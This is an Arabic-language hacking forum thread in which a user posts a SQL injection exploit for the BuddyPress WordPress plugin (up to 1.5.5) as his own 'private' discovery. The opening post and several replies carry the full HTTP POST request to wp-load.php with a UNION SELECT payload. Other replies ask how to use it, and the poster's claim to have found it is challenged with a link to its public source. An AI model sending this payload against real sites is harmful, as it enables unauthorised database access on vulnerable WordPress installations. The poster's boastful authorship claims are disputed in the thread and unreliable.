|
تغره برفيت في سكريب WordPress 1 مرفق :icon31::icon31::icon31::icon31::icon31::icon31::i con31::icon31: السلام عليكم كيف الحال ان شاء الله انتم بخير هاذي تغره في سكريب WordPress . . . كود التغره هاذه هوا [PHP]# Exploit Title: Buddypress plugin of Wordpress remote SQL Injection # Date: March 31, 2012 # Author: Ivan Terkin # Exploitation: Remote Exploit # Bug: Remote SQL Injection # Software Link: buddypress.org # Version: till 1.5.5 # Tested on: Buddypress 1.5.4 POST /wp-load.php HTTP/1.1 User-محمد50 Host: vbspiders.com Accept: */* Referer: http://vbspiders.com/activity/?s=b Connection: Keep-Alive Content-Length: 153 Content-Type: application/x-www-form-urlencoded action=activity_widget_filter&page=1%26exclude%3d1 )and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),( 8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+ Reported to developers and fixed in version 1.5.5[/PHP] وبعدين لعيكم ان هاذي التغره بي اصلهاء من تغرات sql بس قمت انا بي اكتشف بي سكريب WordPress ووجت تغره اس كيو ال وقدمت هاء لكم بااااااااااااااااااااااي كان معكم (((محمد50))) وايضأً لي التحميل من المرفقات :msn-wink::msn-wink::msn-wink::msn-wink: :6::6::6::6::6::6::6::6::6::6::6::6::6::6::6::6::6 ::6::6::6::6::6::6::6: |
رد: تغره برفيت في سكريب WordPress ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟ فين الردود انا تعبت ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ |
رد: تغره برفيت في سكريب WordPress بسم الله ما شاء الله واصل ابداعك ولكن لو سمحت كيف الاستغلال لها ؟؟ |
رد: تغره برفيت في سكريب WordPress يا غالي هدا بلوغين فقط وبحت عنه قليل من نصبه |
رد: تغره برفيت في سكريب WordPress اللاسم عليكمم المهم طريقة الإستغلال |
رد: تغره برفيت في سكريب WordPress اقتباس:
action=activity_widget_filter&page=1%26exclude%3d1 )and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),( 8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+ ومن نحيه لي الستغلالا الكود فهوا من السكريب بي الملف هاذ Buddypress plugin of Wordpress remote SQL Injection وباااااااااااي |
رد: تغره برفيت في سكريب WordPress اقتباس:
:exclamationpoint: ؟ ؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟ ؟؟؟؟؟ ايش تقول يا الغالي والله مش فهمك يا الغالي ؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟ لو تبغاء شي ارسل لي عبر الخص اوكيه بااااااااااااااااااااااااااااااااااااااااااااااااا اااي |
رد: تغره برفيت في سكريب WordPress اقتباس:
من نو ع الملافات هاذ Buddypress plugin of Wordpress remote SQL Injection او تبغاء جهاز من هناء action=activity_widget_filter&page=1%26exclude%3d1 )and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),( 8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+ |
رد: تغره برفيت في سكريب WordPress تسلم ع النقل يا غالي الثغره الاصله http://www.exploit-db.com/exploits/18690/ الثغره مو برايفت ولا حاجه والمكتشف الاصلي MEHYARK يا ريت تزود كلمه منقول تحت |
رد: تغره برفيت في سكريب WordPress اقتباس:
والله انا الدي قدمتهاء لي موقع سكرواتي وموقع 1337day انا الدي قدمتهاء يا الغالي يعني انا من صنعهاء اذا انت تقول ان انا انقل وبس طيب هههههههههههه ايش ريك ان من اليوم ما اقدم تغره لي المواقع حقكوم والله ما اقدم مره اخر لا لي 1337day ولا موقع سوكرتي ولا اي لي واحد وشكرن على الناس الدي ردت على الموضوع بي كلام حلو " " وبعدين ههههه لي علمك ان الموقع اسكررتي هم الدين ترجوانا ان اضم معهم بي كشف التغرات لكن هههههههههههههههههههههههههه خلا ص """واقول لك خبر""" ان هاذي التغره عمرهاء من عام 20004 ............................ يعني قديمه من التغرت الجديده هههههههههههههههههههههههههههههههههههههههههههههههههه هههههههههههههه بااااااااااااااااااااااااااااااااااااااااااااااااا اااااااااااااااااااااااااااااااااااااااااااااااااا ااااااااااااااااااااااااي :icon28::icon28::icon28::icon28::icon28::icon28::i con28::icon28: |
رد: تغره برفيت في سكريب WordPress اقتباس:
وزيدلك شيء مكتشف الثغره تركي عادي جدا لما تذكر منقول |
رد: تغره برفيت في سكريب WordPress اقتباس:
المهم احنا ف منتدى يعني خد الانتقاد بروح رياضه نبدأ مع مكتشف الثغره كود PHP: زي ما قال عبد الصمد هادا موقع الاسبلويت ولو بدك المكتشف الاصلي وفي الفيرجن 1.5.5 فوت هون http://silverspam.net/showthread.php?t=8068 الحاجه التانيه كود PHP: وبعدين كود PHP: وبعدين فوت ع الموقع تبع السكربت http://buddypress.org/2012/02/buddypress-1-5-4/ وشوف اصلا الفيرجن هاي إمتى نزلت كود PHP: كود PHP: ع اعتبار انتا مكتشف الثغره ممكن استفسر عن شغله ورد عيا الحين and(1=0) ايش معناها برمجياُ يعني ايش القصد منها ليش يعني لو حطينا 'or''=' ممكن تشتغل الثغره نصيحه حاول تتواضع ومن تواضع لله رفعه حاول تاخد كلامي ع انه انتقاد بناء انا ما في بيني وبينك حاجه وأخر حاجه عمرك ما تراسلني ع الخاص ف أمان الله *ملاحظه ما تستنى مني رد انا ما بفوت كتير سلام |
رد: تغره برفيت في سكريب WordPress قبل انزل تحت واشوف توضيحات الشباب عرفت انك لاطش الثغرة والدليل لمن سالك الاستغلال ^^ مشكور ع النقل |
رد: تغره برفيت في سكريب WordPress هههههه والله خفت منكم لكن على ما قال اعمل عمل خير تلقي شر لكن طيب اقسم انا ان ما اقدم اي شي بااااااااااااااااااااااااااااااااااااااااااااااااا اااااااي |
| الساعة الآن 12:29 PM |
[ vBspiders.Com Network ]